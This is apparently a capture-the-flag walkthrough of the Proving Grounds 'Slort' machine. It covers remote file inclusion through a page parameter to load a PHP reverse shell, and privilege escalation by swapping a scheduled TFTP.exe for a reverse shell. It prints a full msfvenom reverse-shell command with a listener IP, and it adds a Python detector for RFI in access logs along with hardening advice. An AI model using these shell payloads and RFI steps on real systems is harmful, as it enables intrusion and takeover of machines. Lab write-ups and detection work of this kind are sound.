Slort - Proving Grounds Practice
Enumeration
Nmap
The initial nmap scan revealed that the FTP, SMB and HTTP 8080 ports were open.
Web Enumeration
At first I visited the website, but it only showed the default XAMPP page. Then I applied directory brute forcing and found the /site endpoint.
Visiting the website, I found a ?page parameter, which seemed suspicious.
Exploitation
Remote File Inclusion (RFI)
Later, I tried RFI and it worked.
It worked because the allow_url_include parameter was enabled.
I then downloaded ivan-sincek/php-reverse-shell, changed it to a txt file (RFI to RCE) and updated the IP value.
And I got a user shell.
I then simply read the user flag.
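From the defender's side, the RFI described above leaves a clear trace in the web server's access log: the page parameter carries a URL instead of a local file name. The following is an added example, not part of the original writeup; it assumes Apache's standard access-log layout, and the request path /site/index.php, the file names and the IP addresses in the sample lines are constructed.

```python
import re
from urllib.parse import parse_qsl

# Prefixes that make a PHP include()/require() load non-local content.
REMOTE_PREFIXES = ("http://", "https://", "ftp://", "ftps://",
                   "data:", "php://", "expect://")

# Apache/XAMPP access-log prefix: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

def find_remote_includes(lines, params=("page",)):
    """Return (ip, timestamp, param, value, status) for every request whose
    watched parameter holds a URL or stream wrapper instead of a local name."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line we understand
        query = m["target"].partition("?")[2]
        # parse_qsl percent-decodes, so http%3A%2F%2F... is caught as well.
        for name, value in parse_qsl(query, keep_blank_values=True):
            if name.lower() in params and \
                    value.strip().lower().startswith(REMOTE_PREFIXES):
                hits.append((m["ip"], m["ts"], name, value, int(m["status"])))
    return hits

# Constructed sample lines (documentation IP ranges, hypothetical file names).
SAMPLE = [
    '192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] "GET /site/index.php?page=main.php HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Jan/2024:10:02:13 +0000] "GET /site/index.php?page=http://198.51.100.7/note.txt HTTP/1.1" 200 312',
    '192.0.2.44 - - [01/Jan/2024:10:02:40 +0000] "GET /site/index.php?page=HTTP%3A%2F%2F198.51.100.7%2Fnote.txt HTTP/1.1" 200 312',
    '192.0.2.10 - - [01/Jan/2024:10:03:00 +0000] "GET /site/index.php?ref=http://example.org/&page=about.php HTTP/1.1" 200 4000',
]

if __name__ == "__main__":
    for ip, ts, name, value, status in find_remote_includes(SAMPLE):
        print(f"{ts} {ip} {name}={value!r} -> HTTP {status}")
```

Setting allow_url_include = Off in php.ini and mapping the page value to a fixed allowlist of local files removes the condition this finding depended on.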
Privilege Escalation
Scheduled Tasks
There was a Backup folder and inside it there were three different files. info.txt stated that TFTP.exe is executed every 5 minutes.
So I created a reverse shell using msfvenom.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.210 LPORT=4444 -f exe -o exp.exe
Then I transferred the file as TFTP.exe, set up a netcat listener and waited for 5 minutes.
I simply obtained a SYSTEM shell.